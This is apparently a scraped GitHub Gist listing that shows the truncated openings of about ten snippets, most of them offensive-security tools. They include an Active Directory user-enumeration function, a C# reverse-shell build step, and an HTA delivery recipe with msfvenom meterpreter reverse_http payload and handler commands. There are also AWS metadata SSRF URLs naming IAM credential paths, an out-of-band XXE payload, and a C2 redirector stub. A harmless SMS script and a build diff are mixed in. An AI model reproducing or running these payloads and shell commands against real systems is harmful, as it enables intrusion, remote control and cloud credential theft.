This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Get-NetUser { | |
<# | |
.SYNOPSIS | |
Query information for a given user or users in the domain. | |
.DESCRIPTION | |
This function users [ADSI] and LDAP to query the current | |
domain for all users. Another domain can be specified to | |
query for users across a trust. | |
This is a replacement for "net users /domain" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Net; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
/* | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause | |
Step One: | |
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:revshell.exe rev_http.cs |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# sms.py | |
# Sends sms message to any cell phone using gmail smtp gateway | |
# Written by Alex Le | |
import smtplib | |
# Use sms gateway provided by mobile carrier: | |
# at&t: number@mms.att.net | |
# t-mobile: number@tmomail.net | |
# verizon: number@vtext.com |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<!-- | |
Example By Casey Smith @subTee | |
Generate Shellcode: | |
msfvenom --payload windows/meterpreter/reverse_http LHOST=192.168.56.103 LPORT=8080 --format vba > msf.vba | |
Wrap Shellcode in HTA | |
Deliver | |
Start Msf | |
msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_http;set LPORT 8080;set LHOST 192.168.56.103;set ExitOnSession false; exploit -j" | |
Wait for Shells to Rain |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# Rulz.py | |
# Author: Nick Landers (@monoxgas) - Silent Break Security | |
import os | |
import sys | |
import argparse | |
import re | |
import binascii | |
import codecs |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.IO; | |
using System.Net; | |
using System.Text; | |
using System.IO.Compression; | |
using System.Collections.Generic; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
diff --git a/Makefile.pre.in b/Makefile.pre.in | |
index bcd83bf..efbfd8d 100644 | |
--- a/Makefile.pre.in | |
+++ b/Makefile.pre.in | |
@@ -461,6 +461,7 @@ sharedmods: $(BUILDPYTHON) pybuilddir.txt | |
esac; \ | |
$(RUNSHARED) CC='$(CC)' LDSHARED='$(BLDSHARED)' OPT='$(OPT)' \ | |
_TCLTK_INCLUDES='$(TCLTK_INCLUDES)' _TCLTK_LIBS='$(TCLTK_LIBS)' \ | |
+ PYTHONXCPREFIX='$(DESTDIR)$(prefix)' \ | |
$(PYTHON_FOR_BUILD) $(srcdir)/setup.py $$quiet build |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## AWS | |
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
http://169.254.169.254/latest/user-data | |
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/ami-id | |
http://169.254.169.254/latest/meta-data/reservation-id | |
http://169.254.169.254/latest/meta-data/hostname | |
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import logging | |
import urllib | |
import webapp2 | |
import urllib2 | |
# v1.0.1 - updated to support POST request | |
# change to your IP | |
redirector = "(insert you C2 domain here)" |
OlderNewer